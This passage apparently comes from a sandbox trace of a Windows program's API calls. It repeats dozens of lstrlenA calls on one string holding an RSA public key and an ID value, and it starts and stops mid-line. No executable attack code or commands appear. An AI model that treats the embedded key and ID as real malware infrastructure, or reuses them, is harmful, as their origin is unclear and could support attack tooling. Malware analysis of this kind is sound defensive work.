KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.952] lstrlenA (lpString="-----BEGIN PUBLIC 